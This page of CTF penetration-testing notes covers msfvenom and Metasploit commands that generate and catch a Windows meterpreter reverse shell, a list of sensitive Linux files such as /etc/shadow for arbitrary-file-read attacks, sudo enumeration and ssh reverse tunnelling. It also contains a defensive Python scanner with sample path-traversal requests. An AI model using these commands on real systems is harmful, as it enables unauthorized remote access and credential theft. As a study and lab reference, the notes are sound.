Penetration Testing

Nmap

References

The ageless tool: a penetration-testing guide to the Nmap security scanner:

https://www.freebuf.com/news/141607.html

Windows Penetration

Using the msf suite

Reverse shell

Generate

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker address> LPORT=<attacker port> -f exe > shell.exe

After uploading it to the target machine

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <attacker address>
set LPORT <attacker port>
exploit

After obtaining a meterpreter shell

You can run shell to enter a cmd environment

References

https://guide.offsecnewbie.com/privilege-escalation/windows-pe

Linux Penetration

Sensitive files

/etc/passwd
/etc/shadow

/proc/self

/proc/self/maps
/proc/self/cwd
/proc/self/status
/proc/self/exe

Apache

/etc/httpd/conf/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/sites-enabled/000-default.conf

Wordlist

https://github.com/ev0A/ArbitraryFileReadList
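
A defender-side check for the file list above, as an added example that is not part of the original notes: it scans web access-log lines for requests that reference these paths, undoing nested percent-encoding before matching. The function names, the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths from the list above; "/proc/self/" covers maps, cwd, status and exe.
SENSITIVE_PATHS = (
    "/etc/passwd",
    "/etc/shadow",
    "/proc/self/",
    "/etc/httpd/conf/httpd.conf",
    "/etc/apache2/apache2.conf",
    "/etc/apache2/sites-enabled/000-default.conf",
)

# Request target in a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD|PUT|DELETE|OPTIONS) (\S+) HTTP/[\d.]+"')

def normalize(target, max_rounds=3):
    """Undo nested percent-encoding, then unify separators and case."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return re.sub(r"/{2,}", "/", target.replace("\\", "/").lower())

def find_file_read_attempts(log_lines):
    """Return (line_number, matched_path) for each request naming a sensitive file."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = normalize(match.group(1))
        for path in SENSITIVE_PATHS:
            if path in target:
                hits.append((number, path))
                break
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Mar/2021:16:00:01 +0800] "GET /index.php?page=about HTTP/1.1" 200 512',
    '192.0.2.10 - - [09/Mar/2021:16:00:05 +0800] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1843',
    '192.0.2.10 - - [09/Mar/2021:16:00:09 +0800] "GET /download?f=%252e%252e%252f%252e%252e%252fproc%252fself%252fstatus HTTP/1.1" 200 901',
    '192.0.2.10 - - [09/Mar/2021:16:00:12 +0800] "GET /view?file=....//....//etc//apache2//apache2.conf HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    print(find_file_read_attempts(SAMPLE_LOG))
```

A hit with a 200 status and an unusually large response size is the one to triage first, since it suggests the file content was actually returned.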

Privilege escalation

sudo -l

Tunneling

ssh port forwarding

ssh -R 9001:localhost:9001 [email protected]
© Eki's CTF-notes 2019-2020, CC-by-nc-sa 4.0. All rights reserved, powered by Gitbook. This site was last revised on: 2021-03-09 16:35:16
